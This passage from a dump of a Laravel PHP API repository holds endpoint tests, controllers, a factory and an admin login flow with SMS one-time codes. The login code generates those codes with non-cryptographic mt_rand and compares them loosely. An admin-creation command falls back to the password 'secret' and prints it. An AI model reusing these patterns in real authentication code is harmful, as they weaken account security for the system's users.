*/\n    public function endpoint_invoked_event_dispatched_for_destroy(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\EndUser $endUser */\n        $endUser = factory(EndUser::class)->create();\n\n        /** @var \\App\\Models\\Contribution $contribution */\n        $contribution = factory(Contribution::class)->create([\n            'end_user_id' => $endUser->id,\n        ]);\n\n        Passport::actingAs($endUser->user);\n\n        $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($contribution, $endUser): bool {\n                return $event->getUser()->is($endUser->user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_DELETE\n                    && $event->getDescription() === \"Deleted contribution [{$contribution->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n}\n"
},
{
"alpha_fraction": 0.663551390171051,
"alphanum_fraction": 0.6647196412086487,
"avg_line_length": 26.612903594970703,
"blob_id": "cd06e834764f442134582511fa08704ef433e929",
"content_id": "4d8dfd9f8d1c838ce982d16c71b65ad5a154b6de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1712,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 62,
"path": "/app/Http/Controllers/V1/File/RequestController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\FileTokenResource;\nuse App\\Models\\File;\nuse App\\Models\\FileToken;\nuse App\\Services\\FileService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass RequestController extends ApiController\n{\n /**\n * @var \\App\\Services\\FileService\n */\n protected $fileService;\n\n /**\n * RequestController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\FileService $fileService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n FileService $fileService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n\n $this->fileService = $fileService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\File $file\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(Request $request, File $file): JsonResource\n {\n $this->authorize('request', $file);\n\n $fileToken = DB::transaction(function () use ($request, $file): FileToken {\n return $this->fileService->request($file, $request->user('api')->admin);\n });\n\n event(EndpointInvoked::onCreate($request, \"Requested file [{$file->id}].\"));\n\n return new FileTokenResource($fileToken);\n }\n}\n"
},
{
"alpha_fraction": 0.6736842393875122,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 8.5,
"blob_id": "17ce62f85a7fa1a73da73d4142499b8877e27734",
"content_id": "74df5f2a45c827f88ab5c60d1e726cda36bca303",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 95,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/UserMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait UserMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6702127456665039,
"alphanum_fraction": 0.6808510422706604,
"avg_line_length": 8.399999618530273,
"blob_id": "847d870bfa7a27da7bccf02780a432f7de2e326e",
"content_id": "35619810ef5f8a61d9828ddac37724ea1781dd68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 94,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/EndUserScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait EndUserScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5135278701782227,
"alphanum_fraction": 0.5140583515167236,
"avg_line_length": 24.133333206176758,
"blob_id": "4b94b5d62df252c4f9d4ade53bbfb0b19faf36f4",
"content_id": "90c0e19fd3df3615b91d1ba27f17e36d04c4f06d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1885,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 75,
"path": "/app/Docs/Utils.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException;\n\nclass Utils\n{\n /**\n * Utils constructor.\n */\n protected function __construct()\n {\n // Prevent instantiation.\n }\n\n /**\n * @param array $accessibleBy\n * @param string|null $description\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return string\n */\n public static function operationDescription(\n array $accessibleBy,\n string $description = null\n ): string {\n // Only allow an array of strings.\n foreach ($accessibleBy as $accessor) {\n if (is_string($accessor)) {\n continue;\n }\n\n throw new InvalidArgumentException();\n }\n\n // Format the accessible by into markdown.\n $accessibleBy = collect($accessibleBy)\n ->map(function (string $accessor): string {\n // If class names passed in then convert to meaningful names.\n switch ($accessor) {\n case Admin::class:\n $accessor = 'Admins';\n break;\n case EndUser::class:\n $accessor = 'End users';\n break;\n }\n\n return \"* `{$accessor}`\";\n })\n ->implode(PHP_EOL);\n\n // Prepare the required markdown string.\n $markdown = <<<EOT\n ### Access control\n $accessibleBy\n EOT;\n\n // Append the optional description if provided.\n if ($description) {\n $markdown .= <<<EOT\n \n \n ### Description\n $description\n EOT;\n }\n\n return $markdown;\n }\n}\n"
},
{
"alpha_fraction": 0.5239889025688171,
"alphanum_fraction": 0.5317208766937256,
"avg_line_length": 28.67058753967285,
"blob_id": "8744121fe3863af09696d1739ae5500604c5b414",
"content_id": "97c8749e3132c3ae02d2cb09118276c4c9c4ce53",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 10088,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 340,
"path": "/tests/Feature/V1/NotificationControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\Notification;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass NotificationControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/notifications');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'admin_id',\n 'end_user_id',\n 'channel',\n 'recipient',\n 'content',\n 'sent_at',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $notification = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications');\n\n $response->assertJsonFragment([\n [\n 'id' => $notification->id,\n 'admin_id' => $notification->admin_id,\n 'end_user_id' => $notification->end_user_id,\n 'channel' => $notification->channel,\n 'recipient' => $notification->recipient,\n 'content' => $notification->content,\n 'sent_at' => null,\n 'created_at' => $notification->created_at->toIso8601String(),\n 'updated_at' => $notification->updated_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $notification1 = factory(Notification::class)->create();\n $notification2 = factory(Notification::class)->create();\n $notification3 = factory(Notification::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/notifications', [\n 'filter[id]' => \"{$notification1->id},{$notification2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $notification1->id]);\n $response->assertJsonFragment(['id' => $notification2->id]);\n $response->assertJsonMissing(['id' => $notification3->id]);\n }\n\n /** @test */\n public function can_filter_by_admin_id_for_index(): void\n {\n $admin1 = factory(Admin::class)->create();\n $admin2 = factory(Admin::class)->create();\n\n $notification1 = factory(Notification::class)->create([\n 'user_id' => $admin1->user->id,\n ]);\n $notification2 = factory(Notification::class)->create([\n 'user_id' => $admin2->user->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/notifications', ['filter[admin_id]' => $admin1->id]);\n\n $response->assertJsonFragment(['id' => $notification1->id]);\n $response->assertJsonMissing(['id' => 
$notification2->id]);\n    }\n\n    /** @test */\n    public function can_filter_by_end_user_id_for_index(): void\n    {\n        $endUser1 = factory(EndUser::class)->create();\n        $endUser2 = factory(EndUser::class)->create();\n\n        $notification1 = factory(Notification::class)->create([\n            'user_id' => $endUser1->user->id,\n        ]);\n        $notification2 = factory(Notification::class)->create([\n            'user_id' => $endUser2->user->id,\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create([\n                'name' => 'Test',\n            ])->user\n        );\n\n        $response = $this->getJson('/v1/notifications', ['filter[end_user_id]' => $endUser1->id]);\n\n        $response->assertJsonFragment(['id' => $notification1->id]);\n        $response->assertJsonMissing(['id' => $notification2->id]);\n    }\n\n    /** @test */\n    public function can_sort_by_created_at_for_index(): void\n    {\n        $notification1 = factory(Notification::class)->create([\n            'created_at' => Date::now(),\n        ]);\n        $notification2 = factory(Notification::class)->create([\n            'created_at' => Date::now()->addHour(),\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson('/v1/notifications', ['sort' => '-created_at']);\n\n        $response->assertNthIdInCollection(1, $notification1->id);\n        $response->assertNthIdInCollection(0, $notification2->id);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_index(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\User $user */\n        $user = factory(Admin::class)->create()->user;\n\n        Passport::actingAs($user);\n\n        $this->getJson('/v1/notifications');\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($user): bool {\n                return $event->getUser()->is($user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_READ\n                    && $event->getDescription() === 'Viewed all notifications.'\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Show.\n     */\n\n    /** @test */\n    public function guest_cannot_show(): void\n    {\n        $notification = factory(Notification::class)->create();\n\n        $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_show(): void\n    {\n        $notification = factory(Notification::class)->create();\n\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function admin_can_show(): void\n    {\n        $notification = factory(Notification::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function structure_correct_for_show(): void\n    {\n        $notification = factory(Notification::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n        $response->assertResourceDataStructure([\n            'id',\n            'admin_id',\n            'end_user_id',\n            'channel',\n            'recipient',\n            'content',\n            'sent_at',\n            'created_at',\n            'updated_at',\n        ]);\n    }\n\n    /** @test */\n    public function values_correct_for_show(): void\n    {\n        $notification = factory(Notification::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n        $response->assertJsonFragment([\n            [\n                'id' => $notification->id,\n                'admin_id' => $notification->admin_id,\n                'end_user_id' => $notification->end_user_id,\n                'channel' => $notification->channel,\n                'recipient' => $notification->recipient,\n                'content' => $notification->content,\n                'sent_at' => null,\n                'created_at' => $notification->created_at->toIso8601String(),\n                'updated_at' => $notification->updated_at->toIso8601String(),\n            ],\n        ]);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_show(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\User $user */\n        $user = factory(Admin::class)->create()->user;\n\n        /** @var \\App\\Models\\Notification $notification */\n        $notification = factory(Notification::class)->create();\n\n        Passport::actingAs($user);\n\n        $this->getJson(\"/v1/notifications/{$notification->id}\");\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($user, $notification): bool {\n                return $event->getUser()->is($user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_READ\n                    && $event->getDescription() === \"Viewed notification [{$notification->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n}\n"
},
{
"alpha_fraction": 0.5309892892837524,
"alphanum_fraction": 0.5315852165222168,
"avg_line_length": 23.676469802856445,
"blob_id": "ce753b6fe090021ce9a6346f0c2fcc95f5d84848",
"content_id": "46072af8c17665472b4fd253ddb73ebd5414f0d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1678,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 68,
"path": "/app/Console/Commands/Cv/Make/AdminCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Make;\n\nuse App\\Services\\AdminService;\nuse Illuminate\\Console\\Command;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass AdminCommand extends Command\n{\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = \"cv:make:admin\n {name : The admin's name}\n {email : The admin's email}\n {phone : The admin's phone number}\n {--password= : The password to use}\";\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Create a new admin user';\n\n /**\n * @var \\App\\Services\\AdminService\n */\n protected $adminService;\n\n /**\n * AdminCommand constructor.\n *\n * @param \\App\\Services\\AdminService $adminService\n */\n public function __construct(AdminService $adminService)\n {\n parent::__construct();\n\n $this->adminService = $adminService;\n }\n\n /**\n * Execute the console command.\n *\n * @throws \\Throwable\n */\n public function handle(): void\n {\n $password = $this->option('password') ?? 'secret';\n\n DB::transaction(function () use ($password): void {\n $this->adminService->create([\n 'name' => $this->argument('name'),\n 'phone' => $this->argument('phone'),\n 'email' => $this->argument('email'),\n 'password' => $password,\n ]);\n });\n\n $this->warn(\"Admin successfully created with password: {$password}\");\n }\n}\n"
},
{
"alpha_fraction": 0.590552568435669,
"alphanum_fraction": 0.5930481553077698,
"avg_line_length": 28.371726989746094,
"blob_id": "16b5e73a8d7064adf2e010d810a3aba3fc68c19a",
"content_id": "26cdb17469a870a3867d6620f39701f687e82bbc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5610,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 191,
"path": "/app/Http/Controllers/Auth/Admin/LoginController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Auth\\Admin;\n\nuse App\\Http\\Controllers\\WebController;\nuse App\\Models\\User;\nuse App\\Sms\\GenericSms;\nuse Illuminate\\Contracts\\View\\View;\nuse Illuminate\\Foundation\\Auth\\AuthenticatesUsers;\nuse Illuminate\\Http\\RedirectResponse;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\Auth;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Lang;\nuse Illuminate\\Support\\Str;\nuse Illuminate\\Validation\\ValidationException;\n\nclass LoginController extends WebController\n{\n /*\n |--------------------------------------------------------------------------\n | Login Controller\n |--------------------------------------------------------------------------\n |\n | This controller handles authenticating users for the application and\n | redirecting them to your home screen. The controller uses a trait\n | to conveniently provide its functionality to your applications.\n |\n */\n\n use AuthenticatesUsers;\n\n /**\n * Where to redirect users after login.\n *\n * @var string\n */\n protected $redirectTo = '/';\n\n /**\n * LoginController constructor.\n */\n public function __construct()\n {\n $this->middleware('guest:web')->except('logout');\n $this->middleware('otp')->only('showOtpForm', 'otp');\n }\n\n /**\n * Show the application's login form.\n *\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function showLoginForm(): View\n {\n return view('admin.auth.login');\n }\n\n /**\n * The user has been authenticated.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\User $user\n * @return \\Illuminate\\Http\\RedirectResponse|null\n */\n protected function authenticated(Request $request, User $user): ?RedirectResponse\n {\n // If OTP is disabled then skip this method.\n if (!Config::get('connecting_voices.otp_enabled')) {\n return null;\n }\n\n // Log user out.\n $this->guard()->logout();\n\n // Place the user ID in the session.\n session()->put('otp.user_id', $user->id);\n\n // Generate and send the OTP code.\n $otpCode = mt_rand(10000, 99999);\n session()->put('otp.code', $otpCode);\n $this->dispatchNow(\n new GenericSms($user->admin->phone, \"{$otpCode} is your authentication code.\")\n );\n\n // Forward the user to the code page.\n return redirect(route('auth.admin.login.code'));\n }\n\n /**\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function showOtpForm(): View\n {\n return view('admin.auth.one-time-password');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\RedirectResponse\n */\n public function otp(Request $request): RedirectResponse\n {\n // If the class is using the ThrottlesLogins trait, we can automatically throttle\n // the login attempts for this application. 
We'll key this by the username and\n // the IP address of the client making these requests into this application.\n if ($this->hasTooManyLoginAttempts($request)) {\n $this->fireLockoutEvent($request);\n\n // Throw an exception and exit the method.\n $this->sendOtpLockoutResponse($request);\n }\n\n // Validate the OTP code and login if correct.\n if ($request->code == $request->session()->get('otp.code')) {\n $userId = $request->session()->get('otp.user_id');\n $this->guard()->login(User::findOrFail($userId));\n\n $request->session()->regenerate();\n\n $this->clearLoginAttempts($request);\n\n session()->forget(['otp.user_id', 'otp.code']);\n\n return redirect()->intended($this->redirectPath());\n }\n\n // If the login attempt was unsuccessful we will increment the number of attempts\n // to login and redirect the user back to the login form. Of course, when this\n // user surpasses their maximum number of attempts they will get locked out.\n $this->incrementLoginAttempts($request);\n\n $this->sendFailedOtpResponse($request);\n }\n\n /**\n * Redirect the user after determining they are locked out.\n *\n * @param \\Illuminate\\Http\\Request $request\n */\n protected function sendOtpLockoutResponse(Request $request): void\n {\n $seconds = $this->limiter()->availableIn(\n $this->throttleKey($request)\n );\n\n throw ValidationException::withMessages([\n 'code' => [Lang::get('auth.throttle', ['seconds' => $seconds])],\n ])->status(429);\n }\n\n /**\n * Get the failed login response instance.\n *\n * @param \\Illuminate\\Http\\Request $request\n */\n protected function sendFailedOtpResponse(Request $request): void\n {\n throw ValidationException::withMessages([\n 'code' => ['The code provided is incorrect.'],\n ]);\n }\n\n /**\n * Get the throttle key for the given request.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return string\n */\n protected function throttleKey(Request $request): string\n {\n $key = session()->get(\n 'otp.user_id',\n Str::lower($request->input($this->username()))\n );\n\n return $key . '|' . $request->ip();\n }\n\n /**\n * Get the guard to be used during authentication.\n *\n * @return \\Illuminate\\Contracts\\Auth\\StatefulGuard\n */\n protected function guard()\n {\n return Auth::guard('web');\n }\n}\n"
},
{
"alpha_fraction": 0.6518218517303467,
"alphanum_fraction": 0.6538461446762085,
"avg_line_length": 23.700000762939453,
"blob_id": "1454afa8296f824ac7d3a246cf69e54830fb01ef",
"content_id": "a91e2ed6e236d4bf6c39f8dc854af25e7283fedb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 494,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 20,
"path": "/database/factories/UserFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\User;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Hash;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(User::class, function (Faker $faker): array {\n return [\n 'email' => $faker->unique()->safeEmail,\n 'password' => Hash::make('secret'),\n ];\n});\n\n$factory->state(User::class, 'emailVerified', [\n 'email_verified_at' => Date::now(),\n]);\n"
},
{
"alpha_fraction": 0.6625899076461792,
"alphanum_fraction": 0.6633093357086182,
"avg_line_length": 32.095237731933594,
"blob_id": "eed01a0a65b879695d4ccf16eda97f4746685080",
"content_id": "3411617c56808153efa68c6cb18e15363bea9dc2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1390,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 42,
"path": "/app/Docs/Operations/Notifications/ShowNotificationOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Notifications;\n\nuse App\\Docs\\Schemas\\Notification\\NotificationSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\NotificationsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowNotificationOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific notification')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(NotificationsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, NotificationSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6156501770019531,
"alphanum_fraction": 0.6168009042739868,
"avg_line_length": 21.28205108642578,
"blob_id": "f1f3c200e474d6639c5e5f6ce130856e30872c95",
"content_id": "24abe6557bd8338a8410bb938c490368aca30721",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 869,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 39,
"path": "/app/VariableSubstitution/Email/Admin/NewEndUserSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\Admin;\n\nuse App\\Models\\EndUser;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass NewEndUserSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * NewEndUserSubstituter constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n */\n public function __construct(EndUser $endUser)\n {\n $this->endUser = $endUser;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->endUser->user->email,\n 'END_USER_CREATED_AT' => $this->endUser->user->created_at\n ->format(Config::get('connecting_voices.datetime_format')),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.597183108329773,
"alphanum_fraction": 0.5985915660858154,
"avg_line_length": 18.72222137451172,
"blob_id": "f630e2a3bc841bbf7611e469840c11cf98c136ef",
"content_id": "d78aee8c9cac8a4b67fb4cff253ca269d94a2a1c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 710,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 36,
"path": "/app/Rules/ParentTagIsTopLevel.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse App\\Models\\Tag;\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass ParentTagIsTopLevel implements Rule\n{\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $parentTagId\n * @return bool\n */\n public function passes($attribute, $parentTagId): bool\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = Tag::findOrFail($parentTagId);\n\n return $tag->isTopLevel();\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n return 'The parent tag must be a top level tag.';\n }\n}\n"
},
{
"alpha_fraction": 0.7404580116271973,
"alphanum_fraction": 0.7480915784835815,
"avg_line_length": 12.100000381469727,
"blob_id": "b361ca1fcfc8e96608c943be352e56361bdae94f",
"content_id": "1f373fcd9c5d55756bf9512cd79febe159c5cdf6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 131,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 10,
"path": "/app/Docs/Schemas/Setting/UpdateSettingsSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Setting;\n\nclass UpdateSettingsSchema extends SettingsSchema\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5993150472640991,
"alphanum_fraction": 0.6050228476524353,
"avg_line_length": 24.764705657958984,
"blob_id": "ae7193f9abe20a49de9ddd829fc2f8c54ca6a423",
"content_id": "e282c5c6214820c402c51304e54b7dd3b7a135a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 876,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 34,
"path": "/app/Http/Resources/FileTokenResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\Config;\n\n/**\n * @property \\App\\Models\\FileToken $resource\n */\nclass FileTokenResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n $fileTokenId = $this->resource->id;\n $fileId = $this->resource->file_id;\n\n return [\n 'token' => $this->resource->id,\n 'download_url' => route('files.download', $fileId) . \"?token={$fileTokenId}\",\n 'expires_at' => $this->resource->created_at->addSeconds(\n Config::get('connecting_voices.file_tokens.expiry_time')\n )->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5738396644592285,
"alphanum_fraction": 0.5746835470199585,
"avg_line_length": 19.084745407104492,
"blob_id": "ffd68ac54b337689b9b0fe1b55c2fa4f4ed67c7f",
"content_id": "e820f91cf7bac6e89196014d8f8c2f88d6c61afa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1185,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 59,
"path": "/app/Models/Export.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
